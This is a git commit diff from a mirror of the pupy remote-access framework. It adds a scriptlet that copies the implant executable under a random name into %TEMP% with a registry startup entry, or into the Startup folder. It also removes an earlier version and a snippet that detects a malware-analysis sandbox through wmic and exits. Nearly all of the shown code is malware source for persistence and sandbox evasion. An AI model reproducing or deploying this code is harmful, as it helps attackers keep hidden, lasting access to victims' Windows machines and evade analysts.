mirror of https://github.com/n1nj4sec/pupy.git
improved persistence scriptlet
This commit is contained in:
parent
63881d8ddc
commit
ce784a9469
|
@ -37,6 +37,7 @@ pupy/modules/*.py[cod]
|
||||||
pupy/modules/lib/*.py[cod]
|
pupy/modules/lib/*.py[cod]
|
||||||
pupy/modules/lib/**/*.py[cod]
|
pupy/modules/lib/**/*.py[cod]
|
||||||
pupy/network/**/*.pyc
|
pupy/network/**/*.pyc
|
||||||
|
pupy/scriptlets/**/*.pyc
|
||||||
|
|
||||||
# do not ignore package & templates files
|
# do not ignore package & templates files
|
||||||
!pupy/packages/
|
!pupy/packages/
|
||||||
|
|
|
@ -1,18 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: UTF8 -*-
|
|
||||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
|
||||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
|
||||||
|
|
||||||
|
|
||||||
import subprocess
|
|
||||||
import re
|
|
||||||
try:
|
|
||||||
info = subprocess.STARTUPINFO()
|
|
||||||
info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
|
|
||||||
info.wShowWindow = subprocess.SW_HIDE
|
|
||||||
res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info)
|
|
||||||
if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res):
|
|
||||||
exit()
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
|
@ -0,0 +1,39 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: UTF8 -*-
|
||||||
|
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
||||||
|
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||||
|
import textwrap, random, string
|
||||||
|
from scriptlets import *
|
||||||
|
|
||||||
|
class ScriptletGenerator(Scriptlet):
|
||||||
|
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
|
||||||
|
|
||||||
|
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
|
||||||
|
arguments={
|
||||||
|
'method': 'available methods: registry, startup'
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self, method="registry"):
|
||||||
|
if not method in ("registry", "startup"):
|
||||||
|
raise ScriptletArgumentError("unknown persistence method %s"%method)
|
||||||
|
self.method=method
|
||||||
|
|
||||||
|
def generate(self):
|
||||||
|
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
|
||||||
|
if self.method=="registry":
|
||||||
|
return textwrap.dedent("""
|
||||||
|
import sys, shutil, os.path
|
||||||
|
if sys.platform=="win32":
|
||||||
|
import pupwinutils.persistence
|
||||||
|
path=os.path.join(os.path.expandvars("%TEMP%"), {})
|
||||||
|
shutil.copy(sys.executable, path)
|
||||||
|
pupwinutils.persistence.add_registry_startup(path)
|
||||||
|
""".format(name))
|
||||||
|
else:
|
||||||
|
return textwrap.dedent("""
|
||||||
|
import sys, shutil, os.path
|
||||||
|
if sys.platform=="win32":
|
||||||
|
shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}"))
|
||||||
|
""".format(name))
|
||||||
|
|
||||||
|
|
|
@ -1,23 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: UTF8 -*-
|
|
||||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
|
||||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
|
||||||
import textwrap, random
|
|
||||||
from scriptlets import *
|
|
||||||
|
|
||||||
class ScriptletGenerator(Scriptlet):
|
|
||||||
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
|
|
||||||
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
|
|
||||||
def generate(self):
|
|
||||||
return textwrap.dedent("""
|
|
||||||
import sys, shutil, os.path, random, string
|
|
||||||
if sys.platform=="win32":
|
|
||||||
import pupwinutils.persistence
|
|
||||||
random.seed({})
|
|
||||||
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
|
|
||||||
path=os.path.join(os.path.expandvars("%TEMP%"), name)
|
|
||||||
shutil.copy(sys.executable, path)
|
|
||||||
pupwinutils.persistence.add_registry_startup(path)
|
|
||||||
""".format(int(random.getrandbits(32))))
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue